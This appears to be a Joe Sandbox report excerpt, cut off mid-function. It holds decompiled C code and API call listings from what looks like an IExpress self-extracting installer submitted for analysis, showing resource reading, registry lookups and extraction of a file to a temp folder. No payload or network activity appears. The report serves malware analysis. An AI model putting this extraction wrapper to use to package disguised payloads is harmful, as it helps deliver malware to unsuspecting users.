                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2955
                                                                                                                                                                                                      0x000e295e
                                                                                                                                                                                                      0x000e2962
                                                                                                                                                                                                      0x000e2969
                                                                                                                                                                                                      0x000e296f
                                                                                                                                                                                                      0x000e2974
                                                                                                                                                                                                      0x000e298c
                                                                                                                                                                                                      0x000e2a20
                                                                                                                                                                                                      0x000e2a21
                                                                                                                                                                                                      0x000e2a27
                                                                                                                                                                                                      0x000e2a4c
                                                                                                                                                                                                      0x000e2a4f
                                                                                                                                                                                                      0x000e2a50
                                                                                                                                                                                                      0x000e2a53
                                                                                                                                                                                                      0x000e2a56
                                                                                                                                                                                                      0x000e2a5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e29b2
                                                                                                                                                                                                      0x000e29b2
                                                                                                                                                                                                      0x000e29b5
                                                                                                                                                                                                      0x000e29bd
                                                                                                                                                                                                      0x000e29c3
                                                                                                                                                                                                      0x000e29cc
                                                                                                                                                                                                      0x000e29d5
                                                                                                                                                                                                      0x000e29d7
                                                                                                                                                                                                      0x000e29da
                                                                                                                                                                                                      0x000e29dd
                                                                                                                                                                                                      0x000e29df
                                                                                                                                                                                                      0x000e29ec
                                                                                                                                                                                                      0x000e29f8
                                                                                                                                                                                                      0x000e29fc
                                                                                                                                                                                                      0x000e29ff
                                                                                                                                                                                                      0x000e2a02
                                                                                                                                                                                                      0x000e2a07
                                                                                                                                                                                                      0x000e2a0a
                                                                                                                                                                                                      0x000e2a0f
                                                                                                                                                                                                      0x000e2a19
                                                                                                                                                                                                      0x000e2a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2a0f
                                                                                                                                                                                                      0x000e298c
                                                                                                                                                                                                      0x000e2974
                                                                                                                                                                                                      0x000e2962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e294f
                                                                                                                                                                                                      0x000e2912
                                                                                                                                                                                                      0x000e2a65
                                                                                                                                                                                                      0x000e2a68
                                                                                                                                                                                                      0x000e2a6c
                                                                                                                                                                                                      0x000e2a6f
                                                                                                                                                                                                      0x000e2a6f
                                                                                                                                                                                                      0x000e2a7d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 000E2A6F
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharUpperA.USER32(B7C20988,00000000,00000000,00000000), ref: 000E27A8
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharNextA.USER32(0000054D), ref: 000E27B5
                                                                                                                                                                                                        • Part of subcall function 000E2773: CharNextA.USER32(00000000), ref: 000E27BC
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2829
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2852
                                                                                                                                                                                                        • Part of subcall function 000E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E2870
                                                                                                                                                                                                        • Part of subcall function 000E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000E28A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,000E3938,?,?,?,?,-00000005), ref: 000E2958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 000E2969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,000E3938,?,?,?,?,-00000005,?), ref: 000E2A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 000E2A81
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3949799724-0
                                                                                                                                                                                                      • Opcode ID: 88f8ec384f777ce074e289240a162df0dd5f33e854c108b02078af80fe1e0b20
                                                                                                                                                                                                      • Instruction ID: 384c2ee2039dab720887dddea692b6948e1bf257202ef39f94db5cddd54ec742
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88f8ec384f777ce074e289240a162df0dd5f33e854c108b02078af80fe1e0b20
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F513B31E00259DFDB25DF99C884AAEFBB9FF48700F18412AE911F7221D7359A41DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E000E4169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E000E468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E000E468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E000E44B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x000e417d
                                                                                                                                                                                                      0x000e418f
                                                                                                                                                                                                      0x000e4193
                                                                                                                                                                                                      0x000e41b7
                                                                                                                                                                                                      0x000e41d3
                                                                                                                                                                                                      0x000e41e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e41e7
                                                                                                                                                                                                      0x000e41d5
                                                                                                                                                                                                      0x000e41d6
                                                                                                                                                                                                      0x000e41d8
                                                                                                                                                                                                      0x000e41d9
                                                                                                                                                                                                      0x000e41da
                                                                                                                                                                                                      0x000e41df
                                                                                                                                                                                                      0x000e41e1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e41e1
                                                                                                                                                                                                      0x000e41b9
                                                                                                                                                                                                      0x000e41ba
                                                                                                                                                                                                      0x000e41bc
                                                                                                                                                                                                      0x000e41bd
                                                                                                                                                                                                      0x000e41be
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e41be
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000E30B4), ref: 000E4189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000E30B4), ref: 000E41E7
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: 77e2ce1309fe7d553af3426681a866cc3ca573cb3062f5737e8793ae870170a2
                                                                                                                                                                                                      • Instruction ID: c4822a6b43938de2649f437cb45ae75349ea809c46d801c01ad5933011e83630
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77e2ce1309fe7d553af3426681a866cc3ca573cb3062f5737e8793ae870170a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E01D1B17002943FF7281A678C86FBB618EDBD9B95F004069B705F51C19AACDC4141B6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E7155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                      				_t23 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                      					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                      					_t39 = _t36;
                                                                                                                                                                                                      					if(_t36 == 0xbb40e64e || ( *0xe8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                      						_t36 = 0xbb40e64f;
                                                                                                                                                                                                      						_t39 = 0xbb40e64f;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xe8004 = _t39;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t37 =  !_t36;
                                                                                                                                                                                                      				 *0xe8008 = _t37;
                                                                                                                                                                                                      				return _t37;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x000e715d
                                                                                                                                                                                                      0x000e7161
                                                                                                                                                                                                      0x000e7165
                                                                                                                                                                                                      0x000e7178
                                                                                                                                                                                                      0x000e7182
                                                                                                                                                                                                      0x000e718e
                                                                                                                                                                                                      0x000e7197
                                                                                                                                                                                                      0x000e71a0
                                                                                                                                                                                                      0x000e71b1
                                                                                                                                                                                                      0x000e71b8
                                                                                                                                                                                                      0x000e71c4
                                                                                                                                                                                                      0x000e71c7
                                                                                                                                                                                                      0x000e71cb
                                                                                                                                                                                                      0x000e71d5
                                                                                                                                                                                                      0x000e71da
                                                                                                                                                                                                      0x000e71da
                                                                                                                                                                                                      0x000e71dc
                                                                                                                                                                                                      0x000e71dc
                                                                                                                                                                                                      0x000e71e2
                                                                                                                                                                                                      0x000e71e5
                                                                                                                                                                                                      0x000e71ee

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E7182
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 000E7191
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000E719A
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 000E71A3
                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 000E71B8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                      • Opcode ID: 680a267d980fb411a60a5625239ffd305cc1b48f2ca69f0fb7a9579d391305e5
                                                                                                                                                                                                      • Instruction ID: 138550d7725a86fe7dc626fa9556b798765fd22d3b0c17ee883fd15e6ffb40f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 680a267d980fb411a60a5625239ffd305cc1b48f2ca69f0fb7a9579d391305e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2114F71E05248DFDB50DFB8DA8869EB7F4EF49711F514896E805FB210DA349E048B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E000E43D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x000e19e0
                                                                                                                                                                                                      0x000e19e0
                                                                                                                                                                                                      0x000e19eb
                                                                                                                                                                                                      0x000e19f2
                                                                                                                                                                                                      0x000e19f9
                                                                                                                                                                                                      0x000e19fc
                                                                                                                                                                                                      0x000e1a01
                                                                                                                                                                                                      0x000e1a2a
                                                                                                                                                                                                      0x000e1a2e
                                                                                                                                                                                                      0x000e1a3e
                                                                                                                                                                                                      0x000e1a4f
                                                                                                                                                                                                      0x000e1a62
                                                                                                                                                                                                      0x000e1a6a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1a03
                                                                                                                                                                                                      0x000e1a06
                                                                                                                                                                                                      0x000e1a20
                                                                                                                                                                                                      0x000e1a20
                                                                                                                                                                                                      0x000e1a08
                                                                                                                                                                                                      0x000e1a08
                                                                                                                                                                                                      0x000e1a14
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1a16
                                                                                                                                                                                                      0x000e1a18
                                                                                                                                                                                                      0x000e1a70
                                                                                                                                                                                                      0x000e1a72
                                                                                                                                                                                                      0x000e1a72
                                                                                                                                                                                                      0x000e1a14
                                                                                                                                                                                                      0x000e1a06
                                                                                                                                                                                                      0x000e1a81

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 000E1A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E1A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 000E1A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 000E1A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 000E1A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 2dedcc1972a9eee9885fa11f69e36124a659305ec33aac961f4cb54371facb13
                                                                                                                                                                                                      • Instruction ID: 7f3d700313551aa301751781b272b200a870a399e43d6cc50013a6a0af26fbdc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dedcc1972a9eee9885fa11f69e36124a659305ec33aac961f4cb54371facb13
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC1108316001899FEB10EF64DD48AFE77B8EF09710F1481A5F912F7191CA34AE00CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E000E63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E000E1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      				E000E658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xe9124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xe9124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}















                                                                                                                                                                                                      0x000e63cb
                                                                                                                                                                                                      0x000e63d2
                                                                                                                                                                                                      0x000e63d8
                                                                                                                                                                                                      0x000e63ea
                                                                                                                                                                                                      0x000e63f3
                                                                                                                                                                                                      0x000e6401
                                                                                                                                                                                                      0x000e6402
                                                                                                                                                                                                      0x000e6410
                                                                                                                                                                                                      0x000e6415
                                                                                                                                                                                                      0x000e6433
                                                                                                                                                                                                      0x000e6438
                                                                                                                                                                                                      0x000e6449
                                                                                                                                                                                                      0x000e6463
                                                                                                                                                                                                      0x000e646d
                                                                                                                                                                                                      0x000e6477
                                                                                                                                                                                                      0x000e6477
                                                                                                                                                                                                      0x000e647a
                                                                                                                                                                                                      0x000e643a
                                                                                                                                                                                                      0x000e643a
                                                                                                                                                                                                      0x000e6444
                                                                                                                                                                                                      0x000e6444
                                                                                                                                                                                                      0x000e6492

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 000E63EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-183442868
                                                                                                                                                                                                      • Opcode ID: 5c4854c5703b1050e848ec0a262e07ea5cc26589be1d33227d4f00edd28b10c9
                                                                                                                                                                                                      • Instruction ID: 476e6c3fa579783dec7afc7bbb19a88a18aa4008ac76a173b52f7a171fb9e336
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c4854c5703b1050e848ec0a262e07ea5cc26589be1d33227d4f00edd28b10c9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 712105B1A00258AFD710DF26ECC5FEB73B8EB59350F0041A9F584B7280CAB56D848F60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E000E1680(_t24, _t28 - _t19 + 1, _t33);
